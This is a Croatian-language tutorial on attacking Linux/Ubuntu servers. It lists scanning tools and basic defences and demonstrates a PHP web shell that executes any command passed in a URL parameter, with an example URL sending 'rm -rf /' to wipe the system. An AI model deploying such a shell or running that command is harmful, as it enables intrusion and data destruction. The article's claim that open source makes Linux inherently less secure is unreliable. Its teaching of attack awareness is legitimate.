Hakiranje Linux OS-a: Hakiranje sa Ubuntu (Vodič za naredbe)

Linux je najčešće korišten poslužiteljski operacijski sustav, posebno za web poslužitelje. To je open source; to znači da svatko može imati pristup izvornom kodu. To ga čini manje sigurnim u usporedbi s drugim operativnim sustavima jer napadači mogu proučavati izvorni kod kako bi pronašli ranjivosti. Linux for Hackers je iskorištavanje tih ranjivosti za dobivanje neovlaštenog pristupa sustavu.

U ovom članku ćemo vam predstaviti što je Linux, njegove sigurnosne propuste, hakiranje Ubuntu i protumjere koje možete poduzeti.

Kratka bilješka o Linuxu

Linux je operativni sustav otvorenog koda. Postoje mnoge distribucije operativnih sustava temeljenih na Linuxu kao što su Redhat, Fedora i Ubuntu, itd. Za razliku od drugih operativnih sustava, Linux je manje siguran kada je u pitanju sigurnost. To je zato što je izvorni kod dostupan besplatno, tako da je lako proučavati ranjivosti i iskoristiti ih u usporedbi s drugim operativnim sustavima koji nisu otvorenog koda. Linux se može koristiti kao operativni sustav poslužitelja, desktopa, tableta ili mobilnih uređaja.

Linux programima se može upravljati pomoću GUI-ja ili naredbi. Linux naredbe za Kali Linux hakiranje je djelotvornije i učinkovitije u usporedbi s korištenjem GUI-ja. Iz tog razloga, pomaže znati osnovne Linux naredbe za hakiranje.

Pogledajte ove upute https://www.guru99.com/unix-linux-tutorial.html o tome kako započeti Kali Linux hack.

Linux alati za hakiranje

  • Nessus– ovaj se alat može koristiti za Ubuntu hakirati, skenirati konfiguracijske postavke, zakrpe i mreže itd. može se pronaći na https://www.tenable.com/products/nessus
  • NMap. Ovaj se alat može koristiti za nadzor hostova koji rade na poslužitelju i usluga koje koriste. Također se može koristiti za traženje portova. Može se pronaći na https://nmap.org/
  • SARA – SARA je akronim za Security Auditor's Research Assistant. Kao što naziv implicira, ovaj se alat može koristiti za reviziju mreža protiv prijetnji kao što su SQL Injection, XSS itd. može se pronaći na http://www-arc.com/sara/sara.html

Gore navedeni popis nije konačan; daje vam ideju o dostupnim alatima za Ubuntu hakiranje i hakiranje Linux sustava.

Kako spriječiti hakiranje Linuxa

Linux Hacking iskorištava ranjivosti u operativnom sustavu. Organizacija može usvojiti sljedeću politiku kako bi se zaštitila od takvih napada.

  • Upravljanje patch-om– zakrpe popravljaju greške koje napadači iskorištavaju kako bi ugrozili sustav. Dobra politika upravljanja zakrpama osigurat će stalnu primjenu relevantnih zakrpa na vaš sustav.
  • Ispravna konfiguracija OS-a– druge eksploatacije iskorištavaju slabosti u konfiguraciji poslužitelja. Neaktivna korisnička imena i demoni trebaju biti onemogućeni. Zadane postavke kao što su uobičajene lozinke za aplikaciju, zadana korisnička imena i neki brojevi priključaka trebaju se promijeniti.
  • Sustav za otkrivanje provale– takvi se alati mogu koristiti za otkrivanje neovlaštenog pristupa sustavu. Neki alati imaju sposobnost otkrivanja i sprječavanja takvih napada.

Hakiranje: hakiranje a Ubuntu Linux sustav koji koristi PHP

U ovom praktičnom scenariju naučit ćemo kako hakirati Ubuntu a mi ćemo vam pružiti osnovne informacije o tome kako možete koristiti PHP kompromitirati Linux. Nećemo ciljati nijednu žrtvu. Ako ga želite isprobati, možete instalirati LAMPP na vašem lokalnom računalu.

PHP dolazi s dvije funkcije koje se mogu koristiti za izvršavanje naredbi hakiranja Linuxa. Ima funkcije exec() i shell_exec(). Funkcija exec() vraća zadnji red izlaza naredbe dok shell_exec() vraća cijeli rezultat naredbe kao niz.

U svrhu demonstracije, pretpostavimo da upravitelji napadača uploadaju sljedeću datoteku na web poslužitelj.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

OVDJE,

Gornja skripta dobiva naredbu iz GET varijable pod nazivom cmd. Naredba se izvršava koristeći shell_exec(), a rezultati se vraćaju u preglednik.

Gornji kôd može se iskoristiti pomoću sljedećeg URL-a

http://localhost/cp/konsole.php?cmd=ls%20-l

OVDJE,

  • “…konsole.php?cmd=ls%20-l”dodjeljuje vrijednost ls –l varijabli cmd.

Naredba u Ubuntu za hakiranje poslužitelja bit će izvršeno kao

shell_exec('ls -l') ;

Izvršavanje gornjeg koda na web poslužitelju daje rezultate slične sljedećima.

Hack a Ubuntu Linux sustav koji koristi PHP

Gornja naredba jednostavno prikazuje datoteke u trenutnom direktoriju i dopuštenja

Pretpostavimo da napadač proslijedi sljedeću naredbu

rm -rf /

OVDJE,

  • “rm” uklanja datoteke
  • "rf" pokreće naredbu rm u rekurzivnom načinu rada. Brisanje svih mapa i datoteka
  • “/” upućuje naredbu za početak brisanja datoteka iz korijenskog direktorija

URL napada bi izgledao otprilike ovako

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

rezime

  • Linux je popularan operativni sustav za poslužitelje, stolna računala, tablete i mobilne uređaje.
  • Linux je otvorenog koda, a izvorni kod može dobiti svatko. To olakšava uočavanje ranjivosti. To je jedan od najboljih OS-a za hakere.
  • Osnovne i mrežne naredbe za hakiranje u Ubuntu dragocjeni su Linux hakerima.
  • Ranjivosti su slabosti koje se mogu iskoristiti za kompromitiranje sustava.
  • Dobra sigurnost može pomoći u zaštiti sustava od napadača.